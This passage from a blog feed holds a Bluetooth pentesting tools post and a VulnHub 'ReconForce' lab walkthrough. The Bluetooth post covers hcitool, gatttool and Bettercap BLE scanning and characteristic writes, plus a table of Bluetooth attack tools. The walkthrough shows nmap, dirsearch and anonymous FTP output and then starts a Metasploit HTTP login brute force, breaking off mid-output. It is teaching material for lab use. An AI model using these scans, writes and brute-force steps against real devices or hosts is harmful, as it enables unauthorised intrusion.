plaintext"><table><tr><td class="code"><pre><span class="line">hciconfig hci0 up</span><br></pre></td></tr></table></figure><h3 id="2-3-hcitool"><a href="#2-3-hcitool" class="headerlink" title="2.3 hcitool"></a>2.3 hcitool</h3><p>The hcitool command is a collection of test commands, for example for scanning nearby Bluetooth devices</p><p>1. Scan for nearby devices that are in discoverable mode</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">hcitool scan</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134206231.png" alt="image-20231022134206231"></p><p>2. If the target device shows up during the scan, use the following command to investigate it further</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">hcitool inq</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134331617.png" alt="image-20231022134331617"></p><h3 id="2-3-l2ping"><a href="#2-3-l2ping" class="headerlink" title="2.3 l2ping"></a>2.3 l2ping</h3><p>The l2ping command is an L2CAP ping (<strong>Logical Link Control and Adaptation Protocol</strong>)</p><p><code>l2ping</code> confirms whether the target device is alive</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134425470.png" alt="image-20231022134425470"></p><h3 id="2-4-sdptool"><a href="#2-4-sdptool" class="headerlink" title="2.4 sdptool"></a>2.4 sdptool</h3><p>The sdptool command queries the <strong>Bluetooth Service Discovery Protocol</strong></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022134849415.png" alt="image-20231022134849415"></p><h3 id="2-5-blueranger"><a href="#2-5-blueranger" class="headerlink" title="2.5 blueranger"></a>2.5 blueranger</h3><p>Forces a connection to the target device</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022141310012.png" alt="image-20231022141310012"></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022141352227.png" alt="image-20231022141352227"></p><h3 id="2-6-bluetoothctl"><a href="#2-6-bluetoothctl" class="headerlink" title="2.6 bluetoothctl"></a>2.6 bluetoothctl</h3><p>Bluetoothctl is an interactive and easy-to-use tool for controlling Bluetooth devices, and the main utility for managing Bluetooth on Linux-based operating systems. It is the executable built from the client directory of the bluez source tree: a command-line client provided by bluez that talks to bluetoothd to set up BLE advertising packets, BLE configuration, and to create services, characteristics and so on</p><h4 id="查看controller"><a href="#查看controller" class="headerlink" title="Viewing the controller"></a>Viewing the controller</h4><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152257808.png" alt="image-20231022152257808"></p><h4 id="查看controller的属性"><a href="#查看controller的属性" class="headerlink" title="Viewing the controller's properties"></a>Viewing the controller's properties</h4><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152353358.png" alt="image-20231022152353358"></p><h4 id="扫描周边设备"><a href="#扫描周边设备" class="headerlink" title="Scanning nearby devices"></a>Scanning nearby devices</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">scan on</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152603937.png" alt="image-20231022152603937"></p><h4 id="设备配对"><a href="#设备配对" class="headerlink" title="Pairing a device"></a>Pairing a device</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">pair MAC</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022152905210.png" alt="image-20231022152905210"></p><h3 id="2-7-gatttool"><a href="#2-7-gatttool" class="headerlink" title="2.7 gatttool"></a>2.7 gatttool</h3><p>GATTTool connects to another device, lists its characteristics, and reads and writes their attributes. It can be started as an interactive shell with the -I option</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">gatttool -i hci0 -I</span><br><span class="line">[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful</span><br><span class="line">[A4:CF:12:6C:B3:76][LE]> characteristics</span><br><span class="line"> handle: 0x0002, char properties: 0x20, char value handle:</span><br><span class="line"> 0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb</span><br><span class="line"> handle: 0x0015, char properties: 0x02, char value handle:</span><br><span class="line"> 0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb</span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line"># Write data</span><br><span class="line">gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-write-req <characteristic handle> -n <value></span><br><span class="line">gatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n "04dc54d9053b4307680a"|xxd -ps)</span><br><span class="line"></span><br><span class="line"># Read data</span><br><span class="line">gatttool -i <Bluetooth adapter interface> -b <MAC address of device> --char-read -a 0x16</span><br><span class="line"></span><br><span class="line"># Read connecting with an authenticated encrypted connection</span><br><span class="line">gatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c</span><br></pre></td></tr></table></figure><h3 id="2-8-Bettercap"><a href="#2-8-Bettercap" class="headerlink" title="2.8 Bettercap"></a>2.8 Bettercap</h3><p>Bettercap is the successor to <a href="https://null-byte.wonderhowto.com/how-to/use-ettercap-intercept-passwords-with-arp-spoofing-0191191/">Ettercap</a>, with attack modules for many different radio and network technologies.</p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># Start listening for beacons</span><br><span class="line"># start BLE sniffing</span><br><span class="line">sudo bettercap --eval "ble.recon on"</span><br><span class="line"></span><br><span class="line"># alternatively, enter bettercap's interactive mode and type "ble.recon on" to start BLE sniffing</span><br></pre></td></tr></table></figure><p>As shown below, a large number of Bluetooth devices are picked up</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022232501595.png" alt="image-20231022232501595"></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># Wait some time</span><br><span class="line">>> ble.show # Show discovered devices</span><br><span class="line">>> ble.enum <mac addr> # This will show the service, characteristics and properties supported</span><br><span class="line"></span><br><span class="line"># Write data in a characteristic</span><br><span class="line">>> ble.write <MAC ADDR> <UUID> <HEX DATA></span><br><span class="line">>> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># list the discovered Bluetooth devices</span><br><span class="line">ble.show</span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022232738643.png" alt="image-20231022232738643"></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># enumerate details of the device</span><br><span class="line">ble.enum <MAC address></span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022233011754.png" alt="image-20231022233011754"></p><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"># write data</span><br><span class="line">ble.write <MAC address> <UUID> <HEX DATA></span><br></pre></td></tr></table></figure><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001345230.png" alt="image-20231023001345230"></p><p>The boxed entry in the figure has write permission.</p><p>An attempt to write <code>hello</code> to <code>2f7cabce808d411f9a0cbb92ba96c102</code> failed.</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001655441.png" alt="image-20231023001655441"></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231023001548387.png" alt="image-20231023001548387"></p><p>Although we cannot write to this particular device, many devices do allow it. If we learn that a device runs a service whose vulnerability can be triggered by writing a value, Bettercap can be used to look for further ways of exploiting nearby devices.</p><h3 id="2-9-wireshark"><a href="#2-9-wireshark" class="headerlink" title="2.9 wireshark"></a>2.9 wireshark</h3><p>Capture Bluetooth packets on a phone and analyse them</p><p>Settings - My device - All specs - Status</p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022215844632.png" alt="image-20231022215844632"></p><p>On Redmi phones the log path is</p><p><code>/data/misc/bluetooth/logs</code></p><p>Read the Bluetooth version information in Wireshark</p><p>Search for the string <code>Read Remote Version Information Complete</code></p><p><img src="/2023/10/22/%E8%93%9D%E7%89%99%E5%B7%A5%E5%85%B7/image-20231022230543710.png" alt="image-20231022230543710"></p><h2 id="3-蓝牙存在的安全威胁"><a href="#3-蓝牙存在的安全威胁" class="headerlink" title="3. Security threats in Bluetooth"></a>3. Security threats in Bluetooth</h2><h4 id="3-1基于蓝牙版本的威胁"><a href="#3-1基于蓝牙版本的威胁" class="headerlink" title="3.1 Threats by Bluetooth version"></a>3.1 Threats by Bluetooth version</h4><p>1. Versions before Bluetooth 1.2: link keys derived from the unit key are static and reused in every pairing. Once a device's unit key is compromised (i.e. at the first pairing), any other device holding that key can impersonate the device or any other device that has paired with it.</p><p>2. Versions before Bluetooth 2.1 + EDR: short PIN codes are allowed, and short PINs are easy for an attacker to guess. The encryption keystream depends on the link key, EN_RAND, the master's BD_ADDR and the clock. Within a given encrypted connection only the master's clock changes; if the connection lasts longer than 23.3 hours the clock value starts to repeat, producing the same keystream that was used earlier in the connection. A repeated keystream is a serious cryptographic weakness that lets an attacker recover the original plaintext.</p><p>3. Bluetooth 2.1 to 3.0: when a Security Mode 4 device (v2.1 or later) connects to a device that does not support Security Mode 4 (v2.0 or earlier), it is allowed to fall back to any other security mode, for example Security Mode 1, which provides no security at all, making versions 2.1 to 3.0 more vulnerable. In addition, versions 2.1 to 3.0 use static SSP keys, which greatly increases the likelihood of man-in-the-middle attacks.</p><p>4. Versions before Bluetooth 4.0: an unlimited number of authentication requests is supported, so an attacker can collect the responses to many authentication attempts, which makes cracking the link key easy because the E0 stream cipher used for Bluetooth BR/EDR encryption is relatively weak.</p><p>5. All versions: if link keys are not stored and protected securely with access controls, an attacker may read or modify them. Encryption keys that are too short, the absence of user authentication, and discoverable/connectable devices are all vulnerable.</p><h4 id="3-2基于攻击类型的威胁"><a href="#3-2基于攻击类型的威胁" class="headerlink" title="3.2 Threats by attack type"></a>3.2 Threats by attack type</h4><table><thead><tr><th><strong>Category</strong></th><th><strong>Description</strong></th><th><strong>Threats and toolset</strong></th></tr></thead><tbody><tr><td><strong>Disguise</strong></td><td>Protecting the attacker's identity</td><td>HCIConfig (hide device name)<br>HCIConfig/BTclass (hide device class)<br>BD_addr (hide device address)<br>Spooftooph (device cloning)</td></tr><tr><td><strong>Surveillance</strong></td><td>Information gathering</td><td>HCITool (discover nearby devices)<br>Sdptool (service-layer device scan)<br>Redfang (discover hidden devices)<br>Blueprinter (remote Bluetooth device fingerprinting)<br>BT_audit (Bluetooth audit)<br>War-Nibbling (scanning for insecure Bluetooth devices)<br>Bluefish (search for Bluetooth devices)<br>Bluescanner (search for Bluetooth devices)</td></tr><tr><td><strong>Range extension</strong></td><td>Signal amplification</td><td>Bluetooone (figure 2)</td></tr><tr><td><strong>Sniffing</strong></td><td>Capturing Bluetooth traffic</td><td>BlueSniff<br>HCIDump (HCI data analysis)<br>Ubertooth</td></tr><tr><td><strong>Man-in-the-middle</strong></td><td>Tampering with and capturing data at the endpoints of the channel using a forged identity.</td><td>Bthidproxy (Bluetooth man-in-the-middle analysis tool)</td></tr><tr><td><strong>Snarf attack</strong></td><td>Unauthenticated attack</td><td>Bluesnarfer<br>Blooover<br>BTCrack (PIN cracking tool)</td></tr><tr><t
d>Carwhisperer(无屏幕蓝牙设备测试工具)</td><td></td><td></td></tr><tr><td>Helomoto</td><td></td><td></td></tr><tr><td>Bluebugger(蓝牙漏洞测试)</td><td></td><td></td></tr><tr><td>HID attack(人机接口设备攻击)</td><td></td><td></td></tr><tr><td>Btaptap(蓝牙键盘嗅探)</td><td></td><td></td></tr><tr><td><strong>拒绝服务</strong></td><td>进行拒绝服务攻击</td><td>BlueSmack(L2CAP协议攻击)</td></tr><tr><td>BlueJacking(匿名名片发送)</td><td></td><td></td></tr><tr><td>Smurf(ICMP请求攻击)</td><td></td><td></td></tr><tr><td>信号攻击</td><td></td><td></td></tr><tr><td>PingBlender(Syn洪水攻击)</td><td></td><td></td></tr><tr><td>电池耗尽攻击</td><td></td><td></td></tr><tr><td><strong>漏洞攻击</strong></td><td>通过代码逻辑及安全漏洞进行入侵</td><td>Bluebag (图3)(背包客攻击蓝牙)</td></tr><tr><td>Caribe病毒</td><td></td><td></td></tr><tr><td>Blueborne 漏洞</td><td></td><td></td></tr><tr><td>CVE-2020-0022</td><td></td><td></td></tr><tr><td><strong>模糊测试</strong></td><td>通过注入随机数据来触发安全bug</td><td>BSS(Bluetooth Stack Smasher 蓝牙协议栈模糊测试)</td></tr><tr><td>HCIDUMP(HCI数据分析)</td><td></td><td></td></tr><tr><td>L2cap 模糊测试</td><td></td><td></td></tr></tbody></table><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p><a href="https://github.com/apachecn/apachecn-kali-zh/blob/master/docs/kali-linux-wless-pentest-cb/7.md">apachecn-kali-zh/docs/kali-linux-wless-pentest-cb/7.md at master · apachecn/apachecn-kali-zh (github.com)</a></p><p><a href="https://zhuanlan.zhihu.com/p/559754959">Bluez测试命令汇总 - 知乎 (zhihu.com)</a></p><p><a href="https://cloud.tencent.com/developer/article/2276836?areaId=106001">kali中嗅探蓝牙设备-腾讯云开发者社区-腾讯云 (tencent.com)</a></p><p><a href="https://www.freebuf.com/articles/wireless/258153.html">蓝牙的安全与威胁(上) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.freebuf.com/articles/neopoints/258561.html">蓝牙的安全与威胁(中) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.freebuf.com/articles/neopoints/261295.html">蓝牙的安全与威胁(下) - FreeBuf网络安全行业门户</a></p><p><a href="https://www.infoobs.com/article/20220909/55208.html">11种常见的蓝牙攻击方法简析 | 信息化观察网 - 引领行业变革 (infoobs.com)</a></p><p><a 
href="https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy">渗透测试 BLE - 低功耗蓝牙 - 黑客技巧 (hacktricks.xyz)</a></p><p><a href="https://medium.com/@mks_01/bluetooth-low-energy-recon-using-bettercap-a53bb1b46e93">Bluetooth Low Energy recon using Bettercap | by MKS | Medium</a></p><p><a href="https://zhuanlan.zhihu.com/p/79997196">获取你耳机的蓝牙版本 - 知乎 (zhihu.com)</a></p><p><a href="https://null-byte.wonderhowto.com/how-to/target-bluetooth-devices-with-bettercap-0194421/">How to Target Bluetooth Devices with Bettercap « Null Byte :: WonderHowTo</a></p>]]></content>
<categories>
<category> Tools </category>
</categories>
<tags>
<tag> Pentesting </tag>
<tag> Bluetooth </tag>
</tags>
</entry>
<entry>
<title>ReconForce</title>
<link href="/2023/10/21/ReconForce/"/>
<url>/2023/10/21/ReconForce/</url>
<content type="html"><![CDATA[<h1 id="ReconForce"><a href="#ReconForce" class="headerlink" title="ReconForce"></a>ReconForce</h1><p>Target VM: <a href="https://www.vulnhub.com/entry/hacknos-reconforce,416/">hackNos: ReconForce (v1.1) ~ VulnHub</a></p><p>The goal is to obtain user.txt and root.txt.</p><h2 id="靶机配置"><a href="#靶机配置" class="headerlink" title="Target VM setup"></a>Target VM setup</h2><p>After downloading the target VM, open it with the Open Virtual Machine option in VMware. Before powering it on, set the network adapter to NAT (the same subnet as the Kali attacking machine).</p><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="Penetration test"></a>Penetration test</h2><h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="Scanning with nmap"></a>Scanning with nmap</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">└─# nmap -p- -sV -sT -T4 192.168.5.132</span><br><span class="line">Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-24 17:23 CST</span><br><span class="line">Nmap scan report for 192.168.5.132</span><br><span class="line">Host is up (0.0012s latency).</span><br><span class="line">Not shown: 65532 closed ports</span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">21/tcp open ftp vsftpd 2.0.8 or later</span><br><span class="line">22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open http Apache httpd 2.4.41 ((Ubuntu))</span><br><span class="line">MAC Address: 00:0C:29:48:11:36 (VMware)</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="Directory scan"></a>Directory scan</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">└─# dirsearch -u "http://192.168.5.132" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span><br><span class="line"></span><br><span class="line"> _|. _ _ _ _ _ _|_ v0.4.1</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520</span><br><span class="line"></span><br><span class="line">Output File: /root/.dirsearch/reports/192.168.5.132/_21-09-17_09-25-26.txt</span><br><span class="line"></span><br><span class="line">Error Log: /root/.dirsearch/logs/errors-21-09-17_09-25-26.log</span><br><span class="line"></span><br><span class="line">Target: http://192.168.5.132/</span><br><span class="line"></span><br><span class="line">[09:25:27] Starting: </span><br><span class="line">[09:25:27] 301 - 312B - /css -> http://192.168.5.132/css/</span><br><span class="line">[09:27:52] 403 - 278B - /server-status </span><br><span class="line"> </span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure><p>Now visit the home page. Clicking TroubleShoot in the middle reveals a login prompt, and the URL changes to <code>http://192.168.5.132/5ecure/</code></p><p><img src="/2023/10/21/ReconForce/image-20230628230938400.png" alt="image-20230628230938400"></p><p><img src="/2023/10/21/ReconForce/image-20230628231004177.png" alt="image-20230628231004177"></p><p>The prompt text reads <code>is requesting your username and password. The site says: “Recon Security</code></p><h3 id="尝试ftp匿名登录"><a href="#尝试ftp匿名登录" class="headerlink" title="Trying anonymous FTP login"></a>Trying anonymous FTP login</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─# ftp 192.168.5.132</span><br><span class="line">Connected to 192.168.5.132.</span><br><span class="line">220 "Security@hackNos".</span><br><span class="line">Name (192.168.5.132:root): ftp</span><br><span class="line">331 Please specify the password.</span><br><span class="line">Password:</span><br><span class="line">230 Login successful.</span><br><span class="line">Remote system type is UNIX.</span><br><span class="line">Using binary mode to transfer files.</span><br><span class="line">ftp> ls</span><br><span class="line">200 PORT command successful. Consider using PASV.</span><br><span class="line">150 Here comes the directory listing.</span><br><span class="line">226 Directory send OK.</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The FTP banner reveals the string <code>Security@hackNos</code>.</p><p>So write a small wordlist; the earlier entries can be anything. The main point is to brute-force with a tool.</p><h3 id="使用msf进行http登录爆破"><a href="#使用msf进行http登录爆破" class="headerlink" title="HTTP login brute force with msf"></a>HTTP login brute force with msf</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span 
class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span 
class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br></pre></td><td class="code"><pre><span class="line">└─# msfconsole </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f</span><br><span class="line">EFLAGS: 00010046 </span><br><span class="line">eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 </span><br><span 
class="line">esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 </span><br><span class="line">ds: 0018 es: 0018 ss: 0018 </span><br><span class="line">Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) </span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">Stack: 90909090990909090990909090 </span><br><span class="line"> 90909090990909090990909090 </span><br><span class="line"> 90909090.90909090.90909090 </span><br><span class="line"> 90909090.90909090.90909090 </span><br><span class="line"> 90909090.90909090.09090900 </span><br><span class="line"> 90909090.90909090.09090900 </span><br><span class="line"> .......................... </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> ccccccccc................. </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> .................ccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> cccccccccccccccccccccccccc </span><br><span class="line"> .......................... </span><br><span class="line"> ffffffffffffffffffffffffff </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffffffffffffffffffffff </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> ffffffff.................. </span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! 
V3 R5 I0 N5 00 00 00 00</span><br><span class="line">Aiee, Killing Interrupt handler</span><br><span class="line">Kernel panic: Attempted to kill the idle task!</span><br><span class="line">In swapper task - not syncing </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> =[ metasploit v6.0.48-dev ]</span><br><span class="line">+ -- --=[ 2141 exploits - 1139 auxiliary - 365 post ]</span><br><span class="line">+ -- --=[ 596 payloads - 45 encoders - 10 nops ]</span><br><span class="line">+ -- --=[ 8 evasion ]</span><br><span class="line"></span><br><span class="line">Metasploit tip: When in a module, use back to go </span><br><span class="line">back to the top level prompt</span><br><span class="line"></span><br><span class="line">[*] Starting persistent handler(s)...</span><br><span class="line">msf6 > search http_login</span><br><span class="line"></span><br><span class="line">Matching Modules</span><br><span class="line">================</span><br><span class="line"></span><br><span class="line"> # Name Disclosure Date Rank Check Description</span><br><span class="line"> - ---- --------------- ---- ----- -----------</span><br><span class="line"> 0 auxiliary/scanner/http/dlink_dir_300_615_http_login normal No D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility</span><br><span class="line"> 1 auxiliary/scanner/http/dlink_dir_session_cgi_http_login normal No D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility</span><br><span class="line"> 2 auxiliary/scanner/http/dlink_dir_615h_http_login normal No D-Link DIR-615H HTTP Login Utility</span><br><span class="line"> 3 auxiliary/scanner/http/http_login normal No HTTP Login Utility</span><br><span class="line"> 4 auxiliary/scanner/vmware/vmware_http_login normal No VMWare Web Login Scanner</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Interact with a module by name or index. 
For example info 4, use 4 or use auxiliary/scanner/vmware/vmware_http_login</span><br><span class="line"></span><br><span class="line">msf6 > use 3</span><br><span class="line">msf6 auxiliary(scanner/http/http_login) > show options </span><br><span class="line"></span><br><span class="line">Module options (auxiliary/scanner/http/http_login):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> AUTH_URI no The URI to authenticate against (default:auto)</span><br><span class="line"> BLANK_PASSWORDS false no Try blank passwords for all users</span><br><span class="line"> BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5</span><br><span class="line"> DB_ALL_CREDS false no Try each user/password couple stored in the current database</span><br><span class="line"> DB_ALL_PASS false no Add all passwords in the current database to the list</span><br><span class="line"> DB_ALL_USERS false no Add all users in the current database to the list</span><br><span class="line"> PASS_FILE /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt no File containing passwords, one per line</span><br><span class="line"> Proxies no A proxy chain of format type:host:port[,type:host:port][...]</span><br><span class="line"> REQUESTTYPE GET no Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)</span><br><span class="line"> RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'</span><br><span class="line"> RPORT 80 yes The target port (TCP)</span><br><span 